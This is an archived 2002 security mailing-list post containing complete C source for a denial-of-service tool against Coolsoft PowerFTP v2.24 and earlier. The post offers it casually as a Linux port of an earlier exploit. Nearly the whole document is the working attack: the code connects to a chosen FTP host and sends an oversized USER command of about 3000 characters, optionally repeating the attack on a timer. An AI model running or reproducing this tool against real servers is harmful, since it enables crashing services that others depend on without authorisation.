Coolsoft PowerFTP <= v2.24 Denial of Service (Linux Source)

From: a b (p0pt4rtzat_private)
Date: Sat Oct 12 2002 - 00:20:55 PDT

  • Next message: Daniel Ahlberg: "GLSA: apache" 

    Coded for fun.. I had nothing else to code and had nothing else to do. :P
I coded it cause Armand released C source that wuz for Windows.

Enjoy,
--p0pt4rtz

/*uNF!uNF!uNF!uNF!uNF!uNF!uNF!uNF!uNF!uNF!uNF!uNF!uNF!uNF!
*                                                    uNF!
* PowerFTP Denial of Service (Linux Source)          uNF!
* by p0pt4rtz of Trippin Smurfs                      uNF!
* --                                                 uNF!
* Coded for fun :p                                   uNF!
*                                                    uNF!
*uNF!uNF!uNF!uNF!uNF!uNF!uNF!uNF!uNF!uNF!uNF!uNF!uNF!uNF!
*/

#include <stdio.h>
#include <stdlib.h>
#include <netdb.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <strings.h>
#include <errno.h>

#define VAR   "USER "
#define TITLE "\E[37m"
#define p0p   "\E[33;1m"
#define SMURF "\E[36m"
#define NORM  "\E[m"

struct hostent *he;
struct sockaddr_in sck;

//function declarations
void usage(char *progname);
int conn();
int sdos();
size_t resolve(char *name);
void interm(size_t freedom);
void kconn();
void oconn();

//global vars
int verbose;
int sock;
size_t port, sleepy=0;
char *host=NULL;

void
usage(char *progname)
{
fprintf(stderr, "\xac usage: %s <options> -d <host>\n\n"
                
"-----------.----------------------------------------------\n"
                "-d <host>  | remote host to connect to. (default: 
127.0.0.1)\n"
                "-p <#port> | remote port to connect to. (default: 21)\n"
                "-s <#secs> | reattack after n seconds.\n"
                "-v         | verbosity. twice for greater effect.\n"
                "-h         | this help for this lame ass program.\n"
                "           '\n\n", progname);
}


int
conn()
{
  int ip;

  if (ip=(resolve(host) == 0)) {
    perror("resolve");
    return -1;
  }

  if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
    perror("socket");
    return -1;
  }


  sck.sin_family = AF_INET;
  sck.sin_port = htons(port);
  sck.sin_addr.s_addr = ip;
  memset(&(sck.sin_zero), '\0', 8);

  if (connect(sock, (struct sockaddr *)&sck, sizeof(struct sockaddr)) == -1) 
{
    perror("connect");
    return -1;
  }


return 0; //everything's ok..
}

int
sdos()
{
  int z;
  char sugawh[3006];

  sprintf(sugawh, VAR);

  for(z=5;z<3000;z++)
    sugawh[z]='i';

  if ((send(sock, sugawh, strlen(sugawh), 0)) == -1) {
    perror("send");
    return -1;

  }

return 0; //sugawh!
}

size_t
resolve(char *name)
{
    struct hostent *he;
    unsigned int ip;

    if((ip=inet_addr(name))==(-1))
    {
        if((he=gethostbyname(name))==0)
            return 0;
        memcpy(&ip,he->h_addr,4);
    }
    return ip;
}


void
interm(size_t freedom)
{
  int i;

  if (verbose!=0) fprintf(stderr, "Sleeping. Standby...\r"); fflush(stderr);
  for (i=1; i<= freedom; i++) {
    sleep(1);
      if (verbose >=2)
        fprintf(stderr,"Sleep progress : %d Seconds out of %d \r", i, 
freedom);
        fflush(stderr);
  }
  if (verbose!=0) fprintf(stderr, "Done!                             \r"); 
fflush(stderr);

}

void
kconn()
{
  int a=0,b=0;

  while(!0)
  {
    fprintf(stderr, "\xb9\tConnecting..                                      
     \r");
    fflush(stderr);
    if ((conn())==-1)
      exit(1);

    fprintf(stderr, "\xb2\tSending sugawh to dis bish..                      
     \r");
    fflush(stderr);
    if ((sdos())==-1)
      exit(1);

    close(sock); //close em legs :p
    fflush(stderr);
    fprintf(stderr, "\xb3\tDone!                                             
     \r");
    fflush(stderr);

    interm(sleepy);

  }
}

void
oconn()
{
  fprintf(stderr, "\xb9\tConnecting..                                        
   \r");
  fflush(stderr);
  if ((conn())==-1)
    exit(1);

  fprintf(stderr, "\xb2\tSending sugawh to dis bish..                        
   \r");
  fflush(stderr);
  if ((sdos())==-1)
    exit(1);

  close(sock); //close em legs :p

  fflush(stderr);
  fprintf(stderr, "\xb3\tDone!                                               
   \r");
  fflush(stderr);

  printf("\n\n");
}

int
main(int argc, char *argv[])
{
  char c;

  fprintf(stderr, "\n" TITLE "PowerFTP <= 2.24 Denial of Service (Linux 
Source)" NORM "\n"
                  "by " p0p "p0pt4rtz" NORM " of " SMURF "Trippin Smurfs" 
NORM "\n"
                  "coded for fun :p\n\n");

  if (argc<2) {
    usage(argv[0]);
    exit(1);
  }


  while ((c=getopt(argc, argv, "d:p:s:vh")) != EOF)
  {
    switch(c)
    {
      case 'd': {
        if (strlen(optarg) > 2000) {
          fprintf(stdout, "too long of a hostname: %s\n", optarg);
          exit(1);
        }
        host = optarg;

        break;
      }

      case 'p': {
        port = (optarg==NULL) ? 80 : atoi(optarg);
        if ( port<=0 || port > 65535 ) {
          fprintf(stderr, "invalid portno assignment.\n");
          exit(1);
        }
      break;
      }

      case 's': {
        sleepy = atoi(optarg);
        break;
      }

      case 'v': {
        verbose += 1;
        break;
      }

      case 'h': {
        usage(argv[0]);
        exit(1);
        break;
      }
    }
  }

  if (host==NULL) {
    fprintf(stderr, "no host specified, using default 127.0.0.1\n\n");
    host="127.0.0.1";
  }

  fprintf(stderr,
     "attack information:\n"
     "'''''''''''''''''''\n"
     "remote host: %s\n"
     "remote port: %d\n", host, port);
  if (sleepy!=0)
    fprintf(stderr, "attack interm: %d seconds\n", sleepy);
  fprintf(stderr, "-----------------------------\n");

  if (sleepy!=0)
    kconn();
    else
      oconn();

}




_________________________________________________________________
Join the world’s largest e-mail service with MSN Hotmail. 
http://www.hotmail.com

    This archive was generated by hypermail 2b30 : Mon Oct 14 2002 - 20:21:04 PDT